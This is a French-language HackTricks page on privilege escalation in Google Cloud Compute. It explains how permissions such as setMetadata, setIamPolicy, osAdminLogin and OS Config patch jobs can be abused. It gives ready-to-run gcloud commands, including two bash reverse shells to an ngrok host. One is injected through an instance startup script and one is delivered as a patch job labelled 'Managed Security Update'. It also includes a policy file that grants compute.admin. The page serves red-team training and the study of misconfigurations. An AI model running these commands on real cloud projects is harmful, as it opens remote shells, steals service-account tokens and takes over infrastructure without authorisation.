GCP - Compute Privesc

Tip

Apprenez & pratiquez AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Apprenez & pratiquez GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Apprenez & pratiquez Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Soutenez HackTricks

Compute

Pour plus d’informations sur Compute et VPC (rĂ©seau) dans GCP, consultez :

GCP - Compute Enum

Caution

Notez que pour effectuer toutes les attaques d’escalade de privilĂšges qui nĂ©cessitent de modifier les mĂ©tadonnĂ©es de l’instance (comme ajouter de nouveaux utilisateurs et des clĂ©s SSH), il est nĂ©cessaire d’avoir des permissions actAs sur le SA attachĂ© Ă  l’instance, mĂȘme si le SA est dĂ©jĂ  attachĂ© !

compute.projects.setCommonInstanceMetadata

Avec cette permission, vous pouvez modifier les informations de mĂ©tadonnĂ©es d’une instance et changer les clĂ©s autorisĂ©es d’un utilisateur, ou crĂ©er un nouvel utilisateur avec des permissions sudo. Par consĂ©quent, vous pourrez exĂ©cuter via SSH sur n’importe quelle instance VM et voler le compte de service GCP avec lequel l’instance fonctionne.
Limitations :

  • Notez que les comptes de service GCP fonctionnant dans des instances VM ont par dĂ©faut un champ d’application trĂšs limitĂ©
  • Vous devrez pouvoir contacter le serveur SSH pour vous connecter

Pour plus d’informations sur la façon d’exploiter cette permission, consultez :

GCP - Add Custom SSH Metadata

Vous pouvez Ă©galement effectuer cette attaque en ajoutant un nouveau script de dĂ©marrage et en redĂ©marrant l’instance :

gcloud compute instances add-metadata my-vm-instance \
--metadata startup-script='#!/bin/bash
bash -i >& /dev/tcp/0.tcp.eu.ngrok.io/18347 0>&1 &'

gcloud compute instances reset my-vm-instance

compute.instances.setMetadata

Cette permission donne les mĂȘmes privilĂšges que la permission prĂ©cĂ©dente mais sur des instances spĂ©cifiques au lieu d’un projet entier. Les mĂȘmes exploits et limitations que pour la section prĂ©cĂ©dente s’appliquent.

compute.instances.setIamPolicy

Ce type de permission vous permettra de vous accorder un rĂŽle avec les permissions prĂ©cĂ©dentes et d’escalader les privilĂšges en les abusant. Voici un exemple ajoutant roles/compute.admin Ă  un compte de service :

export SERVER_SERVICE_ACCOUNT=YOUR_SA
export INSTANCE=YOUR_INSTANCE
export ZONE=YOUR_INSTANCE_ZONE

cat <<EOF > policy.json
bindings:
- members:
- serviceAccount:$SERVER_SERVICE_ACCOUNT
role: roles/compute.admin
version: 1
EOF

gcloud compute instances set-iam-policy $INSTANCE policy.json --zone=$ZONE

compute.instances.osLogin

Si OSLogin est activĂ© dans l’instance, avec cette permission, vous pouvez simplement exĂ©cuter gcloud compute ssh [INSTANCE] et vous connecter Ă  l’instance. Vous n’aurez pas de privilĂšges root Ă  l’intĂ©rieur de l’instance.

Tip

Pour vous connecter avec succĂšs avec cette permission Ă  l’intĂ©rieur de l’instance VM, vous devez avoir la permission iam.serviceAccounts.actAs sur le SA attachĂ© Ă  la VM.

compute.instances.osAdminLogin

Si OSLogin est activĂ© dans l’instance, avec cette permission, vous pouvez simplement exĂ©cuter gcloud compute ssh [INSTANCE] et vous connecter Ă  l’instance. Vous aurez des privilĂšges root Ă  l’intĂ©rieur de l’instance.

Tip

Pour vous connecter avec succĂšs avec cette permission Ă  l’intĂ©rieur de l’instance VM, vous devez avoir la permission iam.serviceAccounts.actAs sur le SA attachĂ© Ă  la VM.

compute.instances.create,iam.serviceAccounts.actAs, compute.disks.create, compute.instances.create, compute.instances.setMetadata, compute.instances.setServiceAccount, compute.subnetworks.use, compute.subnetworks.useExternalIp

Il est possible de créer une machine virtuelle avec un compte de service assigné et de voler le token du compte de service en accédant aux métadonnées pour élever les privilÚges.

Le script d’exploitation pour cette mĂ©thode peut ĂȘtre trouvĂ© ici.

osconfig.patchDeployments.create | osconfig.patchJobs.exec

Si vous avez les permissions osconfig.patchDeployments.create ou osconfig.patchJobs.exec, vous pouvez crĂ©er un travail de patch ou un dĂ©ploiement. Cela vous permettra de vous dĂ©placer latĂ©ralement dans l’environnement et d’obtenir une exĂ©cution de code sur toutes les instances de calcul au sein d’un projet.

Notez qu’à l’heure actuelle, vous n’avez pas besoin de la permission actAs sur le SA attachĂ© Ă  l’instance.

Si vous souhaitez exploiter cela manuellement, vous devrez créer soit un travail de patch ou un déploiement.
Pour un travail de patch, exécutez :

cat > /tmp/patch-job.sh <<EOF
#!/bin/bash
bash -i >& /dev/tcp/0.tcp.eu.ngrok.io/18442 0>&1
EOF

gsutil cp /tmp/patch-job.sh gs://readable-bucket-by-sa-in-instance/patch-job.sh

# Get the generation number
gsutil ls -a gs://readable-bucket-by-sa-in-instance

gcloud --project=$PROJECT_ID compute os-config patch-jobs execute \
--instance-filter-names=zones/us-central1-a/instances/<instance-name> \
--pre-patch-linux-executable=gs://readable-bucket-by-sa-in-instance/patch-job.sh#<generation-number> \
--reboot-config=never \
--display-name="Managed Security Update" \
--duration=300s

Pour déployer un déploiement de correctif :

gcloud compute os-config patch-deployments create <name> ...

L’outil patchy pouvait ĂȘtre utilisĂ© dans le passĂ© pour exploiter cette mauvaise configuration (mais maintenant cela ne fonctionne plus).

Un attaquant pourrait Ă©galement en abuser pour la persistance.

compute.machineImages.setIamPolicy

Accordez-vous des permissions supplĂ©mentaires pour l’image de calcul.

compute.snapshots.setIamPolicy

Accordez-vous des permissions supplémentaires pour un instantané de disque.

compute.disks.setIamPolicy

Accordez-vous des permissions supplémentaires pour un disque.

Contourner les portĂ©es d’accĂšs

En suivant ce lien, vous trouverez quelques idĂ©es pour essayer de contourner les portĂ©es d’accĂšs.

ÉlĂ©vation de privilĂšges locale dans une instance GCP Compute

GCP - local privilege escalation ssh pivoting

Références

Tip

Apprenez & pratiquez AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Apprenez & pratiquez GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Apprenez & pratiquez Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Soutenez HackTricks